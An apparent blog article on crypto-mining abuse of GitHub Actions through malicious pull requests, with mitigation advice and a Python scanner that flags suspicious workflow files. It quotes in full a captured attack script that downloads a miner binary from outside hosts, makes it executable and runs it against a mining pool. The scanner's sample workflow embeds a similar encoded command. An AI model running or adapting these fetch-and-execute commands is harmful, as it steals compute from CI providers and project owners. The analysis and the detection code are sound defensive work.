How Hackers Hijack GitHub Actions to Run Free Crypto Mining
Hackers exploit GitHub Actions by submitting malicious pull requests that add hidden workflows, downloading and executing crypto‑mining binaries on GitHub’s free servers, a technique that has spread to other CI platforms and poses a persistent security challenge.
Cryptocurrency prices have surged and made GPUs expensive, leading hackers to seek cheap mining resources by abusing GitHub’s free server infrastructure.
Attackers submit malicious pull requests (PRs) that add a GitHub Action workflow (ci.yml) which downloads and runs a mining binary (often XMRig) on GitHub’s runners.
The first reported case was discovered by a French developer “Tib” in November, who noticed a PR from user “y4ndexhater1” with no description on a repository with zero stars. The PR added a workflow that executed a base64‑encoded command to download a binary, set executable permissions, and run it.
apt update -qq
apt install -y curl git jq
curl -Lfo prog https://github.com/.../prog || curl -Lfo prog https://transfer.sh/OSPjK/prog
ip=$(curl -s -H 'accept: application/dns-json' 'https://dns.google/resolve?name=poolio.magratmail.xyz&type=A' | jq -r '.Answer[0].data')
chmod u+x prog
timeout 4h ./prog -o "${ip}:3000" -u ChrisBarnatt -p ExplainingComputers --cpu-priority 5 > /dev/null
Analysis of the binary showed it was a modified XMRig miner (version 6.8.1). The attack can run dozens of miners per PR, generating small but cumulative profits.
GitHub can ban offending accounts, but attackers use “guerrilla” tactics, creating new accounts and repeatedly opening and closing PRs to evade detection. Similar abuse has been observed on Docker Hub, Travis CI, CircleCI, and even GitLab, where miners are disguised as npm packages.
Mitigation includes disabling automatic workflow runs on PRs, restricting actions to trusted sources, or limiting execution to self‑hosted runners. However, completely eradicating the abuse is difficult.
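A maintainer who cannot disable PR-triggered runs can at least triage workflow files that a pull request adds or changes before approving them. The sketch below is an added example, not code from the original article or from GitHub; the rule names, verdict labels and both sample workflows are assumptions, and the indicators are heuristics modelled on the command quoted above.

```python
import base64
import re

# Heuristic indicators modelled on the command quoted in the article.
RULES = {
    "download": re.compile(r"\b(curl|wget)\b[^\n]*https?://"),
    "make_executable": re.compile(r"\bchmod\s+\S*\+x\b"),
    "run_local_binary": re.compile(r"(^|[\s;&|])\./[\w.-]+", re.M),
    "long_timeout": re.compile(r"\btimeout\s+\d+h\b"),
    "pool_style_args": re.compile(r"\s-o\s+\S+:\d+\b.*\s-u\s+\S+"),
}
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def decode_blobs(text):
    """Return text recovered from base64-looking runs; skip non-text data."""
    decoded = []
    for blob in B64_BLOB.findall(text):
        try:
            candidate = base64.b64decode(blob, validate=True).decode("utf-8")
        except ValueError:  # covers binascii.Error and UnicodeDecodeError
            continue
        if all(c.isprintable() or c.isspace() for c in candidate):
            decoded.append(candidate)
    return decoded

def scan_workflow(text):
    """Return sorted indicator names for the clear text and decoded payloads."""
    layers = [("", text)] + [("decoded:", d) for d in decode_blobs(text)]
    findings = {"base64_payload"} if len(layers) > 1 else set()
    for prefix, layer in layers:
        findings |= {prefix + n for n, rx in RULES.items() if rx.search(layer)}
    return sorted(findings)

def verdict(findings):
    """block: download + chmod + execute chain; review: any other hit."""
    names = {f.split(":")[-1] for f in findings}
    chain = {"download", "make_executable", "run_local_binary"}
    return "block" if chain <= names else ("review" if findings else "allow")

# Constructed sample inputs (not taken from any real repository).
_payload = base64.b64encode(
    b"curl -Lfo prog https://example.invalid/prog\nchmod u+x prog\n"
    b"timeout 4h ./prog -o 192.0.2.10:3000 -u someuser > /dev/null\n").decode()
SUSPICIOUS_WORKFLOW = ("on: [pull_request]\njobs:\n  build:\n"
                       "    runs-on: ubuntu-latest\n    steps:\n"
                       f"      - run: echo {_payload} | base64 -d | sh\n")
BENIGN_WORKFLOW = ("on: [push]\njobs:\n  test:\n    runs-on: ubuntu-latest\n"
                   "    steps:\n      - uses: actions/checkout@v4\n"
                   "      - run: npm ci && npm test\n")
```

Calling `verdict(scan_workflow(text))` on each changed workflow file returns `block`, `review` or `allow`; a `review` result means a single indicator matched and a human should read the step before any runner executes it.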
Security researchers estimate thousands of malicious commits and builds across CI platforms, translating to tens of thousands of mining tasks.
Programmer DD
A tinkering programmer and author of "Spring Cloud Microservices in Action"
